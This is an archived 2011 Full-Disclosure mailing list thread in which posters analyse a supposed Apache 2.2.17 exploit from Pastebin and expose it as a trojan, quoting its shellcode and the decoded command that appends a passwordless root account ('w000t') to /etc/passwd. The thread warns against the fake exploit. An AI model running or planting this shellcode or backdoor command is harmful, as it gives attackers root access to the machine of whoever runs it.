| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 05 Oct 2011 16:06:37 +1300
From: VeNoMouS <venom@...-x.co.nz>
To: adam <adam@...sy.net>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Apache 2.2.17 exploit?
I dunno.... china offers usa that kind of support all the time
..... or so i heard....
On Tue, 4 Oct 2011 21:41:08 -0500, adam wrote:
> Wow, I'm extremely impressed with the support that the developer of
this exploit offers. I had been trying to get the exploit to work for
about an hour or so (couldn't get root on the target) and noticed that
the developer of this exploit logged into my machine (using an old
account I must have set up a while ago named w000t). I couldn't believe
it when I saw that he was logging in to fix the problem, I've NEVER
gotten that kind of support even out of paid software. He's been logged
in for a couple of hours now, and I've noticed that he's
downloaded/uploaded quite a bit (probably downloading the log files and
then uploading patches) so I'm just gonna wait it out. I definitely have
a good feeling about this though.
>
> On Tue, Oct 4, 2011 at 9:21 PM,
xD 0x41 wrote:
>
>> yer it is clarly leet stuff dude...
>> i ran it and
got liek 2000000000000000k2.2.* apache user bot in a night! :P
>> hgehe
(jkin)
>> funny tho.
>> xd
>>
>> On 5 October 2011 13:09, VeNoMouS
wrote:
>>
>>> char evil[] =
>>>
"xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89"
>>>
"x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89"
>>>
"x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8"
>>>
"xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23"
>>>
"x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74"
>>>
"x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a"
>>>
"x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68"
>>>
"x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64"
>>>
"x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44"
>>> "x44x44"
>>> .....
>>> execl("/bin/sh", "sh", "-c", evil, 0);
>>>
>>> .....
>>>
>>>
/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd
>>>
>>>
AHUH.....
>>>
>>> On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn
wrote:
>>>
>>>> I regularly trawl Pastebin.com to find code - often
idiots leave some 0day and similar there and it is nice to find.
>>>>
>>>> Well, seeing as I have no test boxes at the moment, can someone
check this code in a VM? I am not sure if it is legit or not.
>>>>
>>>>
http://pastebin.com/ygByEV2e [1]
>>>>
>>>> Thanks :)
>>>>
>>>>
~Darren
>>>
>>> *
>>> char evil[] =
>>> *
>>>
"xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89"
>>> *
>>>
"x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89"
>>> *
>>>
"x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8"
>>> *
>>>
"xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23"
>>> *
>>>
"x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74"
>>> *
>>>
"x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a"
>>> *
>>>
"x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68"
>>> *
>>>
"x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64"
>>> *
>>>
"x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44"
>>> *
>>> "x44x44";
>>>
>>> _______________________________________________
>>>
Full-Disclosure - We believe in it.
>>> Charter:
http://lists.grok.org.uk/full-disclosure-charter.html [2]
>>> Hosted and
sponsored by Secunia - http://secunia.com/ [3]
>>
>>
_______________________________________________
>> Full-Disclosure - We
believe in it.
>> Charter:
http://lists.grok.org.uk/full-disclosure-charter.html [5]
>> Hosted and
sponsored by Secunia - http://secunia.com/ [6]
Links:
------
[1]
http://pastebin.com/ygByEV2e
[2]
http://lists.grok.org.uk/full-disclosure-charter.html
[3]
http://secunia.com/
[4] mailto:venom@...-x.co.nz
[5]
http://lists.grok.org.uk/full-disclosure-charter.html
[6]
http://secunia.com/
[7] mailto:secn3t@...il.com
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists